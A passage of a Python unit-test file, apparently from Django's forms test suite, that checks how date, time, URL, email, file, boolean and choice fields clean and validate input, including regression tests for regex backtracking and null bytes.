self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('2006-10-25'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('10/25/2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('10/25/06'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('Oct 25 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('October 25 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('October 25, 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('25 October 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('25 October, 2006'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '2006-4-31')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '200a-10-25')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '25/10/06')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
def test_datefield_2(self):
f = DateField(required=False)
self.assertIsNone(f.clean(None))
self.assertEqual('None', repr(f.clean(None)))
self.assertIsNone(f.clean(''))
self.assertEqual('None', repr(f.clean('')))
def test_datefield_3(self):
f = DateField(input_formats=['%Y %m %d'])
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('2006 10 25'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '2006-10-25')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '10/25/2006')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '10/25/06')
def test_datefield_4(self):
# Test whitespace stripping behavior (#5714)
f = DateField()
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' 10/25/2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' 10/25/06 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' Oct 25 2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' October 25 2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' October 25, 2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' 25 October 2006 '))
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ' ')
def test_datefield_5(self):
# Test null bytes (#18982)
f = DateField()
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, 'a\x00b')
def test_datefield_changed(self):
format = '%d/%m/%Y'
f = DateField(input_formats=[format])
d = datetime.date(2007, 9, 17)
self.assertFalse(f.has_changed(d, '17/09/2007'))
def test_datefield_strptime(self):
"""Test that field.strptime doesn't raise an UnicodeEncodeError (#16123)"""
f = DateField()
try:
f.strptime('31 мая 2011', '%d-%b-%y')
except Exception as e:
# assertIsInstance or assertRaises cannot be used because UnicodeEncodeError
# is a subclass of ValueError
self.assertEqual(e.__class__, ValueError)
# TimeField ###################################################################
def test_timefield_1(self):
f = TimeField()
self.assertEqual(datetime.time(14, 25), f.clean(datetime.time(14, 25)))
self.assertEqual(datetime.time(14, 25, 59), f.clean(datetime.time(14, 25, 59)))
self.assertEqual(datetime.time(14, 25), f.clean('14:25'))
self.assertEqual(datetime.time(14, 25, 59), f.clean('14:25:59'))
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, 'hello')
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, '1:24 p.m.')
def test_timefield_2(self):
f = TimeField(input_formats=['%I:%M %p'])
self.assertEqual(datetime.time(14, 25), f.clean(datetime.time(14, 25)))
self.assertEqual(datetime.time(14, 25, 59), f.clean(datetime.time(14, 25, 59)))
self.assertEqual(datetime.time(4, 25), f.clean('4:25 AM'))
self.assertEqual(datetime.time(16, 25), f.clean('4:25 PM'))
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, '14:30:45')
def test_timefield_3(self):
f = TimeField()
# Test whitespace stripping behavior (#5714)
self.assertEqual(datetime.time(14, 25), f.clean(' 14:25 '))
self.assertEqual(datetime.time(14, 25, 59), f.clean(' 14:25:59 '))
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ' ')
def test_timefield_changed(self):
t1 = datetime.time(12, 51, 34, 482548)
t2 = datetime.time(12, 51)
f = TimeField(input_formats=['%H:%M', '%H:%M %p'])
self.assertTrue(f.has_changed(t1, '12:51'))
self.assertFalse(f.has_changed(t2, '12:51'))
self.assertFalse(f.has_changed(t2, '12:51 PM'))
# DateTimeField ###############################################################
def test_datetimefield_1(self):
f = DateTimeField()
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(
datetime.datetime(2006, 10, 25, 14, 30, 59),
f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59))
)
self.assertEqual(
datetime.datetime(2006, 10, 25, 14, 30, 59, 200),
f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200))
)
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006-10-25 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006-10-25 14:30:45.0002'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('2006-10-25 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006-10-25 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006-10-25 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('2006-10-25'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('10/25/2006 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('10/25/2006 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/2006 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/2006 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('10/25/2006'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('10/25/06 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('10/25/06 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/06 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/06 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('10/25/06'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, 'hello')
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, '2006-10-25 4:30 p.m.')
def test_datetimefield_2(self):
f = DateTimeField(input_formats=['%Y %m %d %I:%M %p'])
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(
datetime.datetime(2006, 10, 25, 14, 30, 59),
f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59))
)
self.assertEqual(
datetime.datetime(2006, 10, 25, 14, 30, 59, 200),
f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200))
)
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006 10 25 2:30 PM'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, '2006-10-25 14:30:45')
def test_datetimefield_3(self):
f = DateTimeField(required=False)
self.assertIsNone(f.clean(None))
self.assertEqual('None', repr(f.clean(None)))
self.assertIsNone(f.clean(''))
self.assertEqual('None', repr(f.clean('')))
def test_datetimefield_4(self):
f = DateTimeField()
# Test whitespace stripping behavior (#5714)
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 2006-10-25 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 2006-10-25 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 10/25/2006 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(' 10/25/2006 14:30 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 10/25/2006 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 10/25/06 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 10/25/06 '))
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, ' ')
def test_datetimefield_5(self):
f = DateTimeField(input_formats=['%Y.%m.%d %H:%M:%S.%f'])
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006.10.25 14:30:45.0002'))
def test_datetimefield_changed(self):
format = '%Y %m %d %I:%M %p'
f = DateTimeField(input_formats=[format])
d = datetime.datetime(2006, 9, 17, 14, 30, 0)
self.assertFalse(f.has_changed(d, '2006 09 17 2:30 PM'))
# DurationField ###########################################################
def test_durationfield_1(self):
f = DurationField()
self.assertEqual(datetime.timedelta(seconds=30), f.clean('30'))
self.assertEqual(
datetime.timedelta(minutes=15, seconds=30),
f.clean('15:30')
)
self.assertEqual(
datetime.timedelta(hours=1, minutes=15, seconds=30),
f.clean('1:15:30')
)
self.assertEqual(
datetime.timedelta(
days=1, hours=1, minutes=15, seconds=30, milliseconds=300),
f.clean('1 1:15:30.3')
)
def test_durationfield_2(self):
class DurationForm(Form):
duration = DurationField(initial=datetime.timedelta(hours=1))
f = DurationForm()
self.assertHTMLEqual(
'<input id="id_duration" type="text" name="duration" value="01:00:00">',
str(f['duration'])
)
def test_durationfield_prepare_value(self):
field = DurationField()
td = datetime.timedelta(minutes=15, seconds=30)
self.assertEqual(field.prepare_value(td), duration_string(td))
self.assertEqual(field.prepare_value('arbitrary'), 'arbitrary')
self.assertIsNone(field.prepare_value(None))
# RegexField ##################################################################
def test_regexfield_1(self):
f = RegexField('^[0-9][A-F][0-9]$')
self.assertEqual('2A2', f.clean('2A2'))
self.assertEqual('3F3', f.clean('3F3'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '3G3')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, ' 2A2')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '2A2 ')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
def test_regexfield_2(self):
f = RegexField('^[0-9][A-F][0-9]$', required=False)
self.assertEqual('2A2', f.clean('2A2'))
self.assertEqual('3F3', f.clean('3F3'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '3G3')
self.assertEqual('', f.clean(''))
def test_regexfield_3(self):
f = RegexField(re.compile('^[0-9][A-F][0-9]$'))
self.assertEqual('2A2', f.clean('2A2'))
self.assertEqual('3F3', f.clean('3F3'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '3G3')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, ' 2A2')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '2A2 ')
def test_regexfield_5(self):
f = RegexField('^[0-9]+$', min_length=5, max_length=10)
self.assertRaisesMessage(
ValidationError, "'Ensure this value has at least 5 characters (it has 3).'",
f.clean, '123'
)
six.assertRaisesRegex(
self, ValidationError,
"'Ensure this value has at least 5 characters \(it has 3\)\.',"
" u?'Enter a valid value\.'",
f.clean, 'abc'
)
self.assertEqual('12345', f.clean('12345'))
self.assertEqual('1234567890', f.clean('1234567890'))
self.assertRaisesMessage(
ValidationError, "'Ensure this value has at most 10 characters (it has 11).'",
f.clean, '12345678901'
)
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '12345a')
def test_regexfield_6(self):
"""
Ensure that it works with unicode characters.
Refs #.
"""
f = RegexField('^\w+$')
self.assertEqual('éèøçÎÎ你好', f.clean('éèøçÎÎ你好'))
def test_change_regex_after_init(self):
f = RegexField('^[a-z]+$')
f.regex = '^[0-9]+$'
self.assertEqual('1234', f.clean('1234'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, 'abcd')
# EmailField ##################################################################
# See also validators tests for validate_email specific tests
def test_emailfield_1(self):
f = EmailField()
self.assertWidgetRendersTo(f, '<input type="email" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual('[email protected]', f.clean('[email protected]'))
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'foo')
self.assertEqual('[email protected]\xe4\xf6\xfc\xdfabc.part.com',
f.clean('[email protected]äöüßabc.part.com'))
def test_email_regexp_for_performance(self):
f = EmailField()
# Check for runaway regex security problem. This will take for-freeking-ever
# if the security fix isn't in place.
addr = '[email protected]'
self.assertEqual(addr, f.clean(addr))
def test_emailfield_not_required(self):
f = EmailField(required=False)
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
self.assertEqual('[email protected]', f.clean('[email protected]'))
self.assertEqual('[email protected]', f.clean(' [email protected] \t \t '))
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'foo')
def test_emailfield_min_max_length(self):
f = EmailField(min_length=10, max_length=15)
self.assertWidgetRendersTo(f, '<input id="id_f" type="email" name="f" maxlength="15" />')
self.assertRaisesMessage(
ValidationError, "'Ensure this value has at least 10 characters (it has 9).'",
f.clean, '[email protected]'
)
self.assertEqual('[email protected]', f.clean('[email protected]'))
self.assertRaisesMessage(
ValidationError, "'Ensure this value has at most 15 characters (it has 20).'",
f.clean, '[email protected]'
)
# FileField ##################################################################
def test_filefield_1(self):
f = FileField()
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '', '')
self.assertEqual('files/test1.pdf', f.clean('', 'files/test1.pdf'))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None, '')
self.assertEqual('files/test2.pdf', f.clean(None, 'files/test2.pdf'))
self.assertRaisesMessage(
ValidationError, "'No file was submitted. Check the encoding type on the form.'",
f.clean, SimpleUploadedFile('', b'')
)
self.assertRaisesMessage(
ValidationError, "'No file was submitted. Check the encoding type on the form.'",
f.clean, SimpleUploadedFile('', b''), ''
)
self.assertEqual('files/test3.pdf', f.clean(None, 'files/test3.pdf'))
self.assertRaisesMessage(
ValidationError, "'No file was submitted. Check the encoding type on the form.'",
f.clean, 'some content that is not a file'
)
self.assertRaisesMessage(
ValidationError, "'The submitted file is empty.'",
f.clean, SimpleUploadedFile('name', None)
)
self.assertRaisesMessage(
ValidationError, "'The submitted file is empty.'",
f.clean, SimpleUploadedFile('name', b'')
)
self.assertEqual(SimpleUploadedFile, type(f.clean(SimpleUploadedFile('name', b'Some File Content'))))
self.assertIsInstance(
f.clean(SimpleUploadedFile('我隻氣墊船裝滿晒鱔.txt', 'मेरी मँडराने वाली नाव सर्पमीनों से भरी ह'.encode('utf-8'))),
SimpleUploadedFile
)
self.assertIsInstance(
f.clean(SimpleUploadedFile('name', b'Some File Content'), 'files/test4.pdf'),
SimpleUploadedFile
)
def test_filefield_2(self):
f = FileField(max_length=5)
self.assertRaisesMessage(
ValidationError, "'Ensure this filename has at most 5 characters (it has 18).'",
f.clean, SimpleUploadedFile('test_maxlength.txt', b'hello world')
)
self.assertEqual('files/test1.pdf', f.clean('', 'files/test1.pdf'))
self.assertEqual('files/test2.pdf', f.clean(None, 'files/test2.pdf'))
self.assertEqual(SimpleUploadedFile, type(f.clean(SimpleUploadedFile('name', b'Some File Content'))))
def test_filefield_3(self):
f = FileField(allow_empty_file=True)
self.assertEqual(SimpleUploadedFile,
type(f.clean(SimpleUploadedFile('name', b''))))
def test_filefield_changed(self):
'''
Test for the behavior of has_changed for FileField. The value of data will
more than likely come from request.FILES. The value of initial data will
likely be a filename stored in the database. Since its value is of no use to
a FileField it is ignored.
'''
f = FileField()
# No file was uploaded and no initial data.
self.assertFalse(f.has_changed('', None))
# A file was uploaded and no initial data.
self.assertTrue(f.has_changed('', {'filename': 'resume.txt', 'content': 'My resume'}))
# A file was not uploaded, but there is initial data
self.assertFalse(f.has_changed('resume.txt', None))
# A file was uploaded and there is initial data (file identity is not dealt
# with here)
self.assertTrue(f.has_changed('resume.txt', {'filename': 'resume.txt', 'content': 'My resume'}))
# ImageField ##################################################################
@skipIf(Image is None, "Pillow is required to test ImageField")
def test_imagefield_annotate_with_image_after_clean(self):
f = ImageField()
img_path = os.path.dirname(upath(__file__)) + '/filepath_test_files/1x1.png'
with open(img_path, 'rb') as img_file:
img_data = img_file.read()
img_file = SimpleUploadedFile('1x1.png', img_data)
img_file.content_type = 'text/plain'
uploaded_file = f.clean(img_file)
self.assertEqual('PNG', uploaded_file.image.format)
self.assertEqual('image/png', uploaded_file.content_type)
@skipIf(Image is None, "Pillow is required to test ImageField")
def test_imagefield_annotate_with_bitmap_image_after_clean(self):
"""
This also tests the situation when Pillow doesn't detect the MIME type
of the image (#24948).
"""
from PIL.BmpImagePlugin import BmpImageFile
try:
Image.register_mime(BmpImageFile.format, None)
f = ImageField()
img_path = os.path.dirname(upath(__file__)) + '/filepath_test_files/1x1.bmp'
with open(img_path, 'rb') as img_file:
img_data = img_file.read()
img_file = SimpleUploadedFile('1x1.bmp', img_data)
img_file.content_type = 'text/plain'
uploaded_file = f.clean(img_file)
self.assertEqual('BMP', uploaded_file.image.format)
self.assertIsNone(uploaded_file.content_type)
finally:
Image.register_mime(BmpImageFile.format, 'image/bmp')
# URLField ##################################################################
def test_urlfield_1(self):
f = URLField()
self.assertWidgetRendersTo(f, '<input type="url" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual('http://localhost', f.clean('http://localhost'))
self.assertEqual('http://example.com', f.clean('http://example.com'))
self.assertEqual('http://example.com.', f.clean('http://example.com.'))
self.assertEqual('http://www.example.com', f.clean('http://www.example.com'))
self.assertEqual('http://www.example.com:8000/test', f.clean('http://www.example.com:8000/test'))
self.assertEqual('http://valid-with-hyphens.com', f.clean('valid-with-hyphens.com'))
self.assertEqual('http://subdomain.domain.com', f.clean('subdomain.domain.com'))
self.assertEqual('http://200.8.9.10', f.clean('http://200.8.9.10'))
self.assertEqual('http://200.8.9.10:8000/test', f.clean('http://200.8.9.10:8000/test'))
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'com.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, '.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://invalid-.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://-invalid.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://inv-.alid-.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://inv-.-alid.com')
self.assertEqual('http://valid-----hyphens.com', f.clean('http://valid-----hyphens.com'))
self.assertEqual(
'http://some.idn.xyz\xe4\xf6\xfc\xdfabc.domain.com:123/blah',
f.clean('http://some.idn.xyzäöüßabc.domain.com:123/blah')
)
self.assertEqual(
'http://www.example.com/s/http://code.djangoproject.com/ticket/13804',
f.clean('www.example.com/s/http://code.djangoproject.com/ticket/13804')
)
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, '[a')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://[a')
def test_url_regex_ticket11198(self):
f = URLField()
# hangs "forever" if catastrophic backtracking in ticket:#11198 not fixed
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://%s' % ("X" * 200,))
# a second test, to make sure the problem is really addressed, even on
# domains that don't fail the domain label length check in the regex
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://%s' % ("X" * 60,))
def test_urlfield_2(self):
f = URLField(required=False)
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
self.assertEqual('http://example.com', f.clean('http://example.com'))
self.assertEqual('http://www.example.com', f.clean('http://www.example.com'))
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://.com')
def test_urlfield_5(self):
f = URLField(min_length=15, max_length=20)
self.assertWidgetRendersTo(f, '<input id="id_f" type="url" name="f" maxlength="20" />')
self.assertRaisesMessage(
ValidationError, "'Ensure this value has at least 15 characters (it has 12).'",
f.clean, 'http://f.com'
)
self.assertEqual('http://example.com', f.clean('http://example.com'))
self.assertRaisesMessage(
ValidationError, "'Ensure this value has at most 20 characters (it has 37).'",
f.clean, 'http://abcdefghijklmnopqrstuvwxyz.com'
)
def test_urlfield_6(self):
f = URLField(required=False)
self.assertEqual('http://example.com', f.clean('example.com'))
self.assertEqual('', f.clean(''))
self.assertEqual('https://example.com', f.clean('https://example.com'))
def test_urlfield_7(self):
f = URLField()
self.assertEqual('http://example.com', f.clean('http://example.com'))
self.assertEqual('http://example.com/test', f.clean('http://example.com/test'))
self.assertEqual('http://example.com?some_param=some_value',
f.clean('http://example.com?some_param=some_value'))
def test_urlfield_9(self):
f = URLField()
urls = (
'http://עברית.idn.icann.org/',
'http://sãopaulo.com/',
'http://sãopaulo.com.br/',
'http://пример.испытание/',
'http://مثال.إختبار/',
'http://例子.测试/',
'http://例子.測試/',
'http://उदाहरण.परीक्षा/',
'http://例え.テスト/',
'http://مثال.آزمایشی/',
'http://실례.테스트/',
'http://العربية.idn.icann.org/',
)
for url in urls:
# Valid IDN
self.assertEqual(url, f.clean(url))
def test_urlfield_10(self):
"""Test URLField correctly validates IPv6 (#18779)."""
f = URLField()
urls = (
'http://[12:34::3a53]/',
'http://[a34:9238::]:8080/',
)
for url in urls:
self.assertEqual(url, f.clean(url))
def test_urlfield_not_string(self):
f = URLField(required=False)
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 23)
def test_urlfield_normalization(self):
f = URLField()
self.assertEqual(f.clean('http://example.com/ '), 'http://example.com/')
# BooleanField ################################################################
def test_booleanfield_1(self):
f = BooleanField()
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(True, f.clean(True))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, False)
self.assertEqual(True, f.clean(1))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, 0)
self.assertEqual(True, f.clean('Django rocks'))
self.assertEqual(True, f.clean('True'))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, 'False')
def test_booleanfield_2(self):
f = BooleanField(required=False)
self.assertEqual(False, f.clean(''))
self.assertEqual(False, f.clean(None))
self.assertEqual(True, f.clean(True))
self.assertEqual(False, f.clean(False))
self.assertEqual(True, f.clean(1))
self.assertEqual(False, f.clean(0))
self.assertEqual(True, f.clean('1'))
self.assertEqual(False, f.clean('0'))
self.assertEqual(True, f.clean('Django rocks'))
self.assertEqual(False, f.clean('False'))
self.assertEqual(False, f.clean('false'))
self.assertEqual(False, f.clean('FaLsE'))
def test_boolean_picklable(self):
self.assertIsInstance(pickle.loads(pickle.dumps(BooleanField())), BooleanField)
def test_booleanfield_changed(self):
f = BooleanField()
self.assertFalse(f.has_changed(None, None))
self.assertFalse(f.has_changed(None, ''))
self.assertFalse(f.has_changed('', None))
self.assertFalse(f.has_changed('', ''))
self.assertTrue(f.has_changed(False, 'on'))
self.assertFalse(f.has_changed(True, 'on'))
self.assertTrue(f.has_changed(True, ''))
# Initial value may have mutated to a string due to show_hidden_initial (#19537)
self.assertTrue(f.has_changed('False', 'on'))
# ChoiceField #################################################################
def test_choicefield_1(self):
f = ChoiceField(choices=[('1', 'One'), ('2', 'Two')])
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual('1', f.clean(1))
self.assertEqual('1', f.clean('1'))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 3 is not one of the available choices.'",
f.clean, '3'
)
def test_choicefield_2(self):
f = ChoiceField(choices=[('1', 'One'), ('2', 'Two')], required=False)
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
self.assertEqual('1', f.clean(1))
self.assertEqual('1', f.clean('1'))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 3 is not one of the available choices.'",
f.clean, '3'
)
def test_choicefield_3(self):
f = ChoiceField(choices=[('J', 'John'), ('P', 'Paul')])
self.assertEqual('J', f.clean('J'))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. John is not one of the available choices.'",
f.clean, 'John'
)
def test_choicefield_4(self):
f = ChoiceField(
choices=[
('Numbers', (('1', 'One'), ('2', 'Two'))),
('Letters', (('3', 'A'), ('4', 'B'))), ('5', 'Other'),
]
)
self.assertEqual('1', f.clean(1))
self.assertEqual('1', f.clean('1'))
self.assertEqual('3', f.clean(3))
self.assertEqual('3', f.clean('3'))
self.assertEqual('5', f.clean(5))
self.assertEqual('5', f.clean('5'))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 6 is not one of the available choices.'",
f.clean, '6'
)
def test_choicefield_callable(self):
choices = lambda: [('J', 'John'), ('P', 'Paul')]
f = ChoiceField(choices=choices)
self.assertEqual('J', f.clean('J'))
def test_choicefield_callable_may_evaluate_to_different_values(self):
choices = []
def choices_as_callable():
return choices
class ChoiceFieldForm(Form):
choicefield = ChoiceField(choices=choices_as_callable)
choices = [('J', 'John')]
form = ChoiceFieldForm()
self.assertEqual([('J', 'John')], list(form.fields['choicefield'].choices))
choices = [('P', 'Paul')]
form = ChoiceFieldForm()
self.assertEqual([('P', 'Paul')], list(form.fields['choicefield'].choices))
def test_choicefield_disabled(self):
f = ChoiceField(choices=[('J', 'John'), ('P', 'Paul')], disabled=True)
self.assertWidgetRendersTo(f,
'<select id="id_f" name="f" disabled><option value="J">John</option>'
'<option value="P">Paul</option></select>')
# TypedChoiceField ############################################################
# TypedChoiceField is just like ChoiceField, except that coerced types will
# be returned:
def test_typedchoicefield_1(self):
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int)
self.assertEqual(1, f.clean('1'))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 2 is not one of the available choices.'",
f.clean, '2'
)
def test_typedchoicefield_2(self):
# Different coercion, same validation.
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=float)
self.assertEqual(1.0, f.clean('1'))
def test_typedchoicefield_3(self):
# This can also cause weirdness: be careful (bool(-1) == True, remember)
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=bool)
self.assertEqual(True, f.clean('-1'))
def test_typedchoicefield_4(self):
# Even more weirdness: if you have a valid choice but your coercion function
# can't coerce, you'll still get a validation error. Don't do this!
f = TypedChoiceField(choices=[('A', 'A'), ('B', 'B')], coerce=int)
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. B is not one of the available choices.'",
f.clean, 'B'
)
# Required fields require values
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
def test_typedchoicefield_5(self):
# Non-required fields aren't required
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False)
self.assertEqual('', f.clean(''))
# If you want cleaning an empty value to return a different type, tell the field
def test_typedchoicefield_6(self):
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False, empty_value=None)
self.assertIsNone(f.clean(''))
def test_typedchoicefield_has_changed(self):
# has_changed should not trigger required validation
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=True)
self.assertFalse(f.has_changed(None, ''))
self.assertFalse(f.has_changed(1, '1'))
self.assertFalse(f.has_changed('1', '1'))
def test_typedchoicefield_special_coerce(self):
"""
Test a coerce function which results in a value not present in choices.
Refs #21397.
"""
def coerce_func(val):
return Decimal('1.%s' % val)
